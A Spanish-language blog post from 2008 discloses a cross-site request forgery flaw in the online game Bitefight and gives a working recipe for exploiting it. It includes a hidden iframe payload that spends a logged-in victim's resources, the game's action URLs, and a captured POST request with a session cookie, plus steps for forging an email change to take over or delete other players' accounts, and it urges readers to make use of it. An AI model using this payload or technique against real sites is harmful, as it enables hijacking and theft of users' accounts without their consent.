Bitefight Vulnerabilidad XSRF Bitefight Vulnerabilidad XSRF

Bueno hace algun tiempo (poco en realidad xD ) jugaba bitefight jejejej y por cuestiones ajenas a mi xD me bannearon la cuenta, estuve viendo y bitefight es vulnerable a XSRF lo investigue con algo sencillo, al ver que no pedia confirmacion alguna al momento de hacer un cambio en la cuenta trate con comprar fuerza registrandome con otra cuenta, algo asi:

al poner "codigo malicioso" en alguna web es posible realizar acciones sin consentimiento del usuario, por ejemplo si queremos comprar alguna habilidad o que el usuario gaste dinero en una sola cosa e pondria algo como esto:

< width="0px" src="http://s7.bitefight.com.mx/bite/training.php?b=1" height="0px" align="center">< /iframe >

esa parte es para comprar fuerza, se agrega en una pagina y al momento que el usuario entra a la web maliciosa, automaticamente (si esta logueado en bitefight claro

defensa: http://s7.bitefight.com.mx/bite/training.php?b=2
destreza: http://s7.bitefight.com.mx/bite/training.php?b=3
resistencia: http://s7.bitefight.com.mx/bite/training.php?b=4
carisma: http://s7.bitefight.com.mx/bite/training.php?b=5

y asi hay varias acciones para hacer dentro del bf, tal vez diran que no es muy relevante, pero veamos y adentremos un poco mas en el tema, que tal si hacemos que el codigo malicioso sea un archivo php en el cual mande los headers correctos, podriamos incluso robar cuentas, borrarlas y todo lo que pueda hacer un usuario normal, este es el metodo post que se hace al cambiar un mail:

------------------

http://s7.bitefight.com.mx/bite/einstellungen.php




POST /bite/einstellungen.php HTTP/1.1

Host: s7.bitefight.com.mx

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://s7.bitefight.com.mx/bite/einstellungen.php

Cookie: BiteFight=59116%3B018580472e62cff0a377c14592cc2534

Content-Type: application/x-www-form-urlencoded

Content-Length: 139

w=y&vkey=f9e95b7f78e1c31713bb9d849b0b5f5b&email=komtec1%40gmail.com&rpg=&catch=&1=1&2=1&3=1&4=&5=&6=&7=&8=&passo=&passn1=&passn2=&delete0=0

HTTP/1.x 200 OK

Date: Sun, 19 Oct 2008 08:51:26 GMT

Server: Apache

Connection: close

Cache-Control: no-cache

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 3315

Content-Type: text/html; charset=utf-8

---------------------

si en esa parte cambiamos Cookie por un getcookie() en el servidor de bitefight y en la variable vkey validandola con la sesion, asi como email por el nuestro o el deseado a cambiar en la cuenta, se cambiara el correo, despues de que cargue toda esa parte del code se necesita agregar otro iframe con la direccion:

http://s7.bitefight.com.mx/bite/einstellungen.php?validate=1

para que mande el correo de validacion al mail puesto antes...

asi cualqueir accion que quieran realizar pueden programar el codigo y hacer que la victima entre a la apgina maliciosa :-D

siguiendo estos pasos se puede juankear bitefight jejeje lo unico que tienes que tener en cuenta es poner el servidor adecuado (s1,s2,s3,s4, etc etc) y si es .com.mx o .es o .com.pe etc :-D

PD. les avise y pensaron que no era relevante por lo tanto me tiraron de a loco Lengua por eso libero esto :-D

si quieren ver un video de demostracion de este "bug" aqui tienen la direccion:

http://elbebedero.net/sipsicambia.rar

es el que les enseñe para que vieran que si era vulnerable Lengua

Saludos y espero le sepan sacar provecho :-D

Komtec1

Comentarios

Joey Urbano ha dicho que…
que onda bro. aki pasando a saludar. a ver que dia te das una vuelta por mi blog, saludos brother

Entradas populares de este blog

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Musimetría - música generada de forma automática por computadora.

Solución [fix] a hamachi Logging in .. failed, busy